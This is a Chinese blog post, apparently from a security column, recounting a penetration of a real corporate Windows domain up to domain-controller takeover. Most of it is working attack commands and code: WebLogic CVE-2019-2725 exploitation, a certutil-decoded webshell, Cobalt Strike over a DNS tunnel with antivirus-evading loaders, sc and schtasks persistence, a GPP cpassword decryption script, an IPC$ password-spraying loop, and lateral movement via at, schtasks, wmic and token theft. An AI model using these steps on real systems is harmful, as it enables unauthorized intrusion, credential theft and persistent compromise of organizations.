专栏首页黑战士安全一次真实内网渗透

一次真实内网渗透

前言

内网搞的少,突然遇见一个,目的拿到域控就行了,期间有些其他操作就顺带提一下,主要写了拿域控这条线,目标外网ip:wip1,后面打码严重,见谅,技术比较菜,欢迎大佬们提出宝贵意见

打点

访问http://wip1/并添加一个随意路径,发现是weblogic

尝试利用weblogic的漏洞,CVE-2019-2725 成功

信息收集

ipconfig /all 发现存在域:gxxxxxxxxx.com

whoami /all 权限system

net user /domain 查看域用户(有点多)

'net group "domain admins" /domain 查看域管理员 有 个administrator

net group "domain computers" /domain 查看域内主机名

net group "domain controllers" /domain 查看域控主机名,通过ping主机名 可以获取3台域控的ip

tasklist 查看进程有没杀软(存在卡巴斯基)

Netstat -ano 查看端口开放情况

arp -a 可以推测出内网可能有那些ip段和存活主机

query user || qwinsta 查看当前登陆用户(wip1/administrator登陆中)

主要的整理哈

目前知道内网有2个段当前主机内网ip为 192.xx.xx.x5

10.xx.xx.xx 和 192.xx.xx.xx

域控的ip为

192.xx.xx.x3 192.xx.xx.x2 10.xx.xx.x2

  1. 一些账号,一些主机名

为了方便后续操作,base64编码和解码写入jsp马(哥斯拉)

在利用certutil 解码:Certutil -decode a.txt a.jsp

内网渗透

CS 上线

因为存在卡巴,要绕过杀软,并且通过ping 外网是ping 不通的,可能改机器不能出网

dns隧道和加载器加载加密的shellcode实现上线

dns配置

配置方式如下买一个域名添加如下记录

cs中配置

用Stageless 的shellcode,也就是如下 不然可能会导致上线很慢或者不能上线

ip: 192.xx.xx.x5 上线

权限维持

创建自启动服务进行权限维持

sc create "xxx" binpath= "cmd /c start "C:/windows/temp/xxx.bat""&&sc config "xxx" start= auto&&net start xxx

成功上线

创建定时任务避免进程被杀 每周运行一次

schtasks /create /tn "xxx" /tr "C:/windows/temp/xxx.bat" /sc weekly /mo 1 /ru system

schtasks /run /tn "xxx"

成功上线

横向渗透

密码信息

  • 收集存在gpp目录中的各种明文或者加密账号 shell dir \\域名\sysvol\域名\

批量查看那些文件中包括password

shell findstr /s /i /m /c:"password" \\域名\SYSVOL\域名\Policies*.xml

利用shell type 查看其中加密的密码

  • 利用脚本解密
import sys
from Crypto.Cipher import AES
from base64 import b64decode


key = """
4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')
cpassword = "加密的字符串"
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password)
print o[:-ord(o[-1])].decode('utf16')
  • 利用loagonpasswords 抓取密码,只抓到了本机administrator的密码
  • 数据库账号密码

其实还有rdp登录,浏览器等密码(没抓取,先尝试以上秘密)

横向获取所有主机ip

思路

  1. domain computers 组获取主机名 + ping

Spn获取主机名+ping

setspn -t /domain -q */* > spn.txt

因为dns实在太慢了,容易断开,而且该域比较大, 就没大规模ping和扫描, 通过看 domain computers 组 通过主机名发现了有些主机的功能, 通过ping 这些主机发现全都在192这个段,并且我们具有权限的那台主机也在这段,思考了哈就先弄192这个段吧

横向渗透

利用刚才获取的密码尝试192段 ,利用了cs自带psexec 等方法批量上线,发现都是不行的,应该是有杀软,只能手动来搞了

先利用进程注入一个administrator 权限的进程获得本地管理员权限

也可以利用令牌窃取获取本地管理员权限

批量尝试,建立了链接

for /L %I in (1,1,254) do @net use \192.xx.xx.%I\ipc$ "刚才获取的密码" /user:administrator

查看那些主机有管理员登陆过(在这期间也拿了几个具有有外网ip的webshell)

shell tasklist /s ip /v

发现192.xx.xx.x0 这太主机上有域管进程并且存在卡巴

copy shellcode 和加载器到建立ipc链接的主机上

利用at 定时任务进行上线

shell net time \\ip2 查看远程主机时间

shell at time \ip 12:57 xxx.bat

等了一会,幸运的是,成功上线,同样走的dns,其实可以结合第一个shell 走smb 隧道

同样做好权限维持,查看端口发现有对外网的链接, 走http 隧道(可以利用云函数做中转隐藏cs服务IP)

上线

期间休息过一阵子没有弄,加载器被杀完了,重新改加载器,上线,但是at 命令没了(估计被发现了)......,换schtasks

schtasks /create /F /s 192.xx.xx.x0 /u administrator /p "密码" /tn test /tr "c:\windows\temp\xxxxx.bat" /sc DAILY /mo 1 /st 13:20

目前上线2台,192.xx.xx.x0 有域管理登录过,要想获取域管理员权限,常见抓秘密和hash,但是可能第二次面杀不到位,失败,还有查找各个文件等等,就不试了,直接令牌窃取,获取域管理员权限

gxxxxxxxxxxx\administrator

接下来就是登录域控,发现定时任务不行了,尝试wmic

shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c whoami>f:\xxx\xxx\result.txt"

copy shellcode 和加载器到建立ipc链接的主机上,然后执行

shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c f:\xx\xxx\xx.bat"

上线

差不多行了,数据那些就不下载了,也不维权了,交差,后面利用frp 随便访问了哈内网的web,找到一个弱口令,可以设置域策略

结束

太菜了太菜了

原文链接:http://baidu.com

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 实战|记一次域渗透靶场的内网渗透

    •IP1:10.10.10.80•IP2:192.168.111.80•OS:Windows 2008•网站搭建:Weblogic 10.3.6 MSSQL 2...

    HACK学习
  • 记一次内网渗透(二)

    在上一节《记一次基础的Vulnstack渗透经验分享》中,我们简单的对vulnstack 1的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控...

    HACK学习
  • 记一次内网渗透练习

    前段时间看了一下内网渗透,所以想找个环境练习一下,恰好有个兄弟丢了个站点出来,一起“练习内网”,然后就开始了“实战代练”。由于“懒”,所以记录时间和截图有些是补...

    HACK学习
  • 内网渗透的一次记录

    ‍‍‍ ‍‍在对目标进行渗透‍‍时‍,一般‍情况下,我们首先获得对方‍服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续再对目...

    洛米唯熊
  • 内网渗透 | 记录一次简单的域渗透

    VM1双网卡,第一个桥接一个VMnet2,桥接的作用是模拟将其web服务暴露在外网。攻击机是在桥接网卡的网络中。

    HACK学习
  • 实战 | 记一次靶场内网渗透(五)

    在上一节 《记一次Vulnstack靶场内网渗透(四)》中,我们玩过了vulnstack 3这个靶场,通过信息收集、Joomla CMS漏洞利用、权限提升、以及...

    HACK学习
  • 一次内网渗透测试实验过程

    https://blog.csdn.net/weixin_44991517/article/details/90718228

    潇湘信安
  • 记一次靶场内网渗透(四)

    在上一节 [记一次Vulnstack靶场内网渗透(三)]中,我们简单的对vulnstack 2的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域...

    HACK学习
  • 实战 | 记一次Vulnstack靶场内网渗透(三)

    在上一节《记一次Vulnstack靶场内网渗透(二)》中,我们简单的对vulnstack 4的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控...

    HACK学习
  • 实战|记一次内网靶机渗透测试

    可以看到如果ad_id不为空就删除两边的空白符号,否则输出Error,然后就会执行getone方法,跟踪下getone。

    HACK学习
  • 实战 | 记一次站库分离的内网渗透

    WEB服务器,但是首页只有一个IIS 7的欢迎界面,所以先看一下端口顺便扫个目录。

    HACK学习
  • Vulnstack 内网渗透(一)

    开放的80和3306端口 看到开放了3306就想到了phpmyadmin服务,尝试下发现真的存在

    ly0n
  • 内网渗透 | 域渗透实操ATT&CK

    Extensions—>Templates,然后选择随意一个模板进入—>New File

    HACK学习
  • 实战 | 记一次基础的内网Vulnstack靶机渗透一

    靶场地址与介绍:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

    HACK学习
  • 记一次详细的内网渗透过程

    尝试各种命令但是发现回显太慢,未找到web路径,无法写web马、exe马,这里尝试使用hta文件。

    HACK学习
  • 内网渗透 | 内网穿透

    学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。通过这个私网内部的路由器(NAPT方式)和外...

    黑白天安全
  • 渗透中的内网渗透

    本节主要介绍当拿下一台机器后,应该做的一些信息收集,尽可能的收集密码,去尝试其他机器。

    Jumbo
  • 内网渗透

    外网更侧重于找漏洞寻找突破口 举个简单的例子: 把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。

    宸寰客
  • 记一次渗透实战

    http://xxx.xx.xxx.xx:9002/xxxxxx/tdb.20xxx129.sql

    Gcow安全团队

扫码关注云+社区

领取腾讯云代金券